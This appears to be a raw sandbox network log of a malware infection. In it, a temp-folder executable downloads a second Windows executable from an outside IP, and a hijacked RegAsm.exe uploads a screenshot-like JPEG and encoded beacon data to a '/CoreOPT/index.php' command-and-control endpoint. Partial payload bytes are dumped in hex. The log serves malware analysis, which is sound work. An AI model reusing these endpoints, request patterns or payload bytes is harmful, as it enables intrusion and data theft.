Aug 31, 2024 22:42:31.616952896 CEST	1236	IN	Data Raw: 73 e0 bf f3 8e 14 e0 3c 27 6b bd a9 61 e8 97 01 59 ca ef 73 e9 1c 6e 64 bd 97 16 0a 3b 4f 8a 52 62 67 21 7d 14 c4 b4 9d ca 75 28 d4 99 ad ca b7 89 0a 35 5f 1a a6 9b 4d de 63 66 90 8b da a8 bd 27 78 64 7b 84 51 f3 ec 3f d3 60 e6 4e 10 66 ef 1a 99 Data Ascii: s<'kaYsnd;ORbg!}u(5_Mcf'xd{Q?`Nf`H`\mKxDJ+O'CG$JmRbB#&&zatq~^\|$y>*VI'idI\2Hm#Q\E>rpHdW2],4ZFVzHaQq+h"k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49796	185.216.214.225	80	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:30.950422049 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:31.630641937 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:31 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:31.630660057 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:31.630671024 CEST	448	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:31.630681038 CEST	1236	IN	Data Raw: e7 58 2d 11 c4 c8 9d e4 be d0 3d b8 23 a4 8d db 5c 91 26 b7 e3 a0 c2 10 9b 3c c3 d2 6d 50 bd 14 04 63 5c 70 da 87 2b 17 b3 7e bc ad 5e 1c 17 b6 3b 75 73 2c 36 a1 4d cb 73 96 0f 94 fb 9e 87 34 d6 f5 2e c4 c9 7c b2 1f 2c 9a b0 99 3f 5f 0c d4 7a d9 Data Ascii: X-=#\&<mPc\p+~^;us,6Ms4.\|,?_zynQnMXB<a@*XI]cjP[QJL6dH._'bnf)VUCifb@!S!MKIT~J+:~).8-7\
Aug 31, 2024 22:42:31.630692005 CEST	1236	IN	Data Raw: fd 3b af 28 92 73 f3 84 bf 25 cf 26 90 15 75 e7 8e b8 45 97 4e 8a f9 df fd d3 e2 d2 b2 61 b6 65 86 32 d0 50 69 0c 9f f3 24 3d 27 f8 f7 59 ea b0 9c 99 d0 c1 d0 d3 2f dd 82 57 d5 a6 b6 bf a3 00 80 65 f3 64 5b f7 6e 97 9d c9 66 8e cb 72 1b b7 8c cc Data Ascii: ;(s%&uENae2Pi$='Y/Wed[nfrM;hDP2[IR\|64t25Qb;3v!_{{Nrf=n[*Kj0\|L?'k$x.x\^e2fql_R`c ?Xn(
Aug 31, 2024 22:42:31.630702019 CEST	1236	IN	Data Raw: 00 c7 02 b2 4e 88 19 0c f7 97 50 f2 f0 12 b4 36 98 62 83 40 71 a5 6e c4 fc fb 3d 74 b3 af da 16 e3 ff d2 1b a0 f1 7a c0 b5 d9 0c 97 c5 42 93 4f ab 3c ee 27 9d 72 aa 3e ab a3 6c ff 1a 0f 80 f7 64 8e 97 21 8a 3b d4 d4 e5 75 9d c3 68 56 d9 1c 6d c5 Data Ascii: NP6b@qn=tzBO<'r>ld!;uhVmrT+d?WGFPH^'h%;Tdjq?k7LBuw&Pt!L0s\|.F4VyW2)Wo)QYOIjPQm\|F1yXxQUX
Aug 31, 2024 22:42:31.630714893 CEST	1236	IN	Data Raw: 18 ed 9a 7e da d2 6c 95 c1 eb 3e e4 05 2c 98 c2 03 b9 87 b1 7e fd 74 50 ed 90 13 1a a2 60 f7 d6 8b ca 63 36 f1 43 be b0 81 02 ee bf 34 d2 0b 4a 1c 59 9d ef 3f e2 b2 47 49 24 69 49 3c 3d 68 0a fd e3 5d 16 ae 50 cb 58 5f e0 18 32 55 e6 29 0e f1 2e Data Ascii: ~l>,~tP`c6C4JY?GI$iI<=h]PX_2U).YdA7'e$-yVhJMGF5[0!Hh[I[P{)$/*_l>L`!lYD_,p^`wI+<C8Ne}u-MP
Aug 31, 2024 22:42:31.630723953 CEST	896	IN	Data Raw: 8d 53 6a 66 c6 d1 12 4a 1e 6c a1 98 d8 6d 3a f7 00 9a 1b 1a 9f f9 07 38 5d 27 79 67 a1 38 65 7a 4f 45 f5 96 3d 38 0b 7a b1 f7 2e b0 97 96 a2 bc f9 7a 94 93 72 b1 50 3e 0c c3 59 4f 50 be 74 cf 69 67 8e 00 a7 ce e9 5f 32 14 cb 4c f9 c1 0c 37 e2 25 Data Ascii: SjfJlm:8]'yg8ezOE=8z.zrP>YOPtig_2L7%_[K l ]x%eDs'6f,'%(8Z+.tS#E8Gs]=#n&#*4F-bc!y,\yxS?&Vvhz^a$ZJOx
Aug 31, 2024 22:42:31.630737066 CEST	1236	IN	Data Raw: a8 b4 df 58 8e ac 7a a5 8d 10 b5 20 85 44 e7 66 ae 43 7a 43 8b 9a e3 46 94 4f cc 96 52 04 49 57 58 b8 7f a4 68 0e c9 50 1a d6 39 1f 3e fe 6e 57 4d e2 fe 70 af 96 2b 4d 31 58 83 f5 8c c7 e0 e6 8c 03 bd 9f 95 dc c8 a8 76 94 8f be 64 7c 4f 12 90 ab Data Ascii: Xz DfCzCFORIWXhP9>nWMp+M1Xvd\|OZ(}e8)i6Dam=J!"E:xQYt"<D}s.>M`z<?S6nMK+.ioq2Sx\|tA6d~STu&HwI@'O6$/RO@w
Aug 31, 2024 22:42:31.630745888 CEST	224	IN	Data Raw: c1 a9 55 64 02 e1 56 12 52 1d 61 6b 9f 75 66 0f f7 77 fe ae 4c 09 f9 9c 6a 1a e2 77 5f d5 b8 0f 57 75 84 96 d0 ab 75 e4 70 fd b4 6f b1 f2 16 6b ed ba be 8c 64 59 3d 30 bf 8f 28 a8 09 8c f8 ee 0b 3c d4 64 c3 dc 17 b1 b0 c8 b7 18 ae 2b 00 d0 9f 86 Data Ascii: UdVRakufwLjw_WuupokdY=0(<d+6_nh<}TKhY{-)*p_f4-(cU!^GD$9V:>Fk,8>if2u3`.
Aug 31, 2024 22:42:31.639883041 CEST	1236	IN	Data Raw: 73 e0 bf f3 8e 14 e0 3c 27 6b bd a9 61 e8 97 01 59 ca ef 73 e9 1c 6e 64 bd 97 16 0a 3b 4f 8a 52 62 67 21 7d 14 c4 b4 9d ca 75 28 d4 99 ad ca b7 89 0a 35 5f 1a a6 9b 4d de 63 66 90 8b da a8 bd 27 78 64 7b 84 51 f3 ec 3f d3 60 e6 4e 10 66 ef 1a 99 Data Ascii: s<'kaYsnd;ORbg!}u(5_Mcf'xd{Q?`Nf`H`\mKxDJ+O'CG$JmRbB#&&zatq~^\|$y>*VI'idI\2Hm#Q\E>rpHdW2],4ZFVzHaQq+h"k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49798	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:31.242501020 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMjY0 Host: 185.215.113.19 Content-Length: 101416 Cache-Control: no-cache
Aug 31, 2024 22:42:31.242571115 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 6a 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMjY0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:31.242604971 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:31.242624998 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:31.242636919 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:31.242667913 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:31.242840052 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:31.242849112 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:31.242871046 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:31.242882013 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:31.242921114 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49801	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:32.752608061 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:33.652650118 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:33.669274092 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:34.030296087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49804	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:32.957149029 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAwMDQ0 Host: 185.215.113.19 Content-Length: 100196 Cache-Control: no-cache
Aug 31, 2024 22:42:32.957149029 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 77 4d 44 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAwMDQ0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:32.957149029 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:32.957149029 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:32.957149029 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:32.957149029 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:32.957149029 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:32.957297087 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:32.957297087 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:32.957297087 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:32.957297087 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49805	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:33.803998947 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:34.430541039 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:34 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:34.430560112 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:34.430571079 CEST	1236	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:34.430731058 CEST	1236	IN	Data Raw: d7 78 b5 74 70 4f 6b 98 da 97 8c ad bf 38 8a f4 36 46 30 1a 6d c4 e4 29 6a 3f 82 39 1d 6c ef 88 d7 e8 ab 7d 98 dc 9f f4 a8 61 b3 ae 58 a5 ab c2 1a 73 c7 c8 b2 ca 50 36 52 fe cc 7b 69 29 4c 0d 2b a6 49 af 86 35 12 a3 ce 45 01 e5 bc dc 39 2b db 5b Data Ascii: xtpOk86F0m)j?9l}aXsP6R{i)L+I5E9+[`J-)gH9` zs`;kW&:j5/bw8cuie2M4(0/xf0HU&#\.Y3n$A45ydW%PkUm2@j_^hQ<
Aug 31, 2024 22:42:34.430742025 CEST	896	IN	Data Raw: 77 b8 e9 1d ee fc 08 3c 24 7f e5 54 42 ed ec b4 b1 1b b2 e6 2b 0b ef f9 f2 60 3b 0a 7d c3 6f 51 6a ba cd 2b 3b 75 fc 38 e1 6d c3 0e 76 95 d4 7f 59 bb 1e 99 f1 cc c8 19 32 8b c6 ca a2 2c 17 5a 81 92 db ed 4f eb bc 5c 57 de 5c a3 4c b9 63 be 40 ab Data Ascii: w<$TB+`;}oQj+;u8mvY2,ZO\W\Lc@O>m7%6~@=j:$[HD{[?>MBs\ONs5+_GijL`5Pn)c0CWV#mg3xm&eW,;zark
Aug 31, 2024 22:42:34.430752993 CEST	1236	IN	Data Raw: 62 1f f1 fe 25 52 12 10 ff fa 73 87 d7 6b 6f 56 2b 18 e0 bd 62 d9 e6 be 50 d7 eb 97 d4 12 89 b3 9d d2 d0 cb 08 76 61 20 8a 65 4c 8d d6 00 dc 7a 67 bd 24 01 0f 55 e9 c8 b2 d3 8f 4b d0 4c 6f 36 53 95 0d 8a a5 87 2e 54 22 b8 31 80 38 8e ae c9 37 00 Data Ascii: b%RskoV+bPva eLzg$UKLo6S.T"187P0@/%o0go+f&A=.5S$["4cWi2:\xw_KI;Gvy4BC$eyeS+>kWh)*M5wz+y
Aug 31, 2024 22:42:34.430763006 CEST	1116	IN	Data Raw: 95 e0 9f c5 d9 cf 97 bd e5 ae fc eb 85 63 a6 c7 32 a9 97 b5 9b 1c f3 b1 b4 28 03 d0 56 2e 3c 13 98 4f 8e 5c b4 4a 8b 73 f6 95 6f 62 04 37 0f 9e 90 5c 3c 0f e9 d2 a4 d1 45 fc 5b 1c 92 ec 40 2c c4 41 64 24 12 7b 33 13 5e bb 90 57 ee 15 d7 79 0c 62 Data Ascii: c2(V.<O\Jsob7\<E[@,Ad${3^WybxdnH7+z/y%{f9<\;IZ ^6#BmAZE1o%IBA~M2kU+$,1Y}]itfRGcM(C\|g
Aug 31, 2024 22:42:34.430860996 CEST	1236	IN	Data Raw: 0c 79 39 88 bb f8 90 cd 08 ed e2 cb d9 a5 6e c2 8f 11 cb e2 e1 32 c7 c7 19 a6 8a 5c 30 13 a1 4e ed 82 54 01 a4 94 9f 4c 51 e6 04 db 13 4d 12 7b ab 3d 36 68 da 6b 9a d5 a3 44 7d d8 bb 49 ce 86 c1 cc ea 1e e5 13 17 a6 bd 9b 53 a5 f1 68 94 9f d8 00 Data Ascii: y9n2\0NTLQM{=6hkD}ISheah!Xv;ZO=Q(j\c&gurIZZC9[nuH:F:1EP'm:sq:~"}e.USw4ZBHHs}S
Aug 31, 2024 22:42:34.430871010 CEST	1236	IN	Data Raw: 67 1c e9 a3 c8 35 20 c1 d4 c5 f1 d2 a2 32 04 1a 4d 0c df f4 45 9e 84 a7 3d fe 52 5a 74 d7 08 fc 9d e7 48 3a ed de a5 74 93 06 59 81 01 3c 99 da 02 e5 c2 90 f8 e9 71 43 ee 02 4d 36 b7 bb 79 79 49 dc 9e 74 44 df 19 dc 36 45 99 43 6f 04 d5 c1 09 83 Data Ascii: g5 2ME=RZtH:tY<qCM6yyItD6ECo1aH}r t\%-2yOcxc.M^Q;tDU%o}sHyqiW%}aFS9yX]XU>du!Pb~[t'}HDRUV+-32;O'
Aug 31, 2024 22:42:34.430882931 CEST	1236	IN	Data Raw: 94 e9 7e d7 37 57 e0 1f 2d cf 25 7a 7f 0e 9f 1e 47 b6 bb 25 c8 bf 1b 67 72 23 d3 6d 73 a3 21 df 6f 03 80 9d 8f 3e d8 3e 39 f8 8a 44 48 a6 da 68 25 26 ef be ec cd 51 3d 06 6b 64 04 2c 24 b0 fb 96 31 5b b2 aa 4b 99 09 a5 1f 63 63 53 ba 19 96 0f aa Data Ascii: ~7W-%zG%gr#ms!o>>9DHh%&Q=kd,$1[KccS1.O2l}KW<G+QExFu:=fDBM:SLH:y"k*9_0!}\| cHpJ"s%nhO^)HbG.IF]
Aug 31, 2024 22:42:34.439167976 CEST	1236	IN	Data Raw: e0 cf 37 85 9a e9 1d c7 a2 a4 25 3a 41 d9 10 a2 a8 5c 09 14 c8 a0 ab 80 b7 f7 c1 f1 a8 27 03 85 6c e6 fe 1c 50 fa ad 77 17 d1 76 4a 21 bd bf fc 1d 52 df 0e c1 ef 66 78 c0 85 56 93 3c 90 4c a8 32 c2 0c 23 a1 93 26 c1 91 7e e3 2e e2 39 8e 0e 4e 40 Data Ascii: 7%:A\'lPwvJ!RfxV<L2#&~.9N@X{{T [4(fr&Dy3d_x2XP<I.8*ZGd&t^8b}Tw@J(C@;VyT_K.lq$so\M\|MVQa%rA#E<?kbA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49809	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:34.165730000 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:35.022066116 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:35.024612904 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:35.384934902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49815	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:35.515688896 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:36.531152010 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:36.629228115 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: 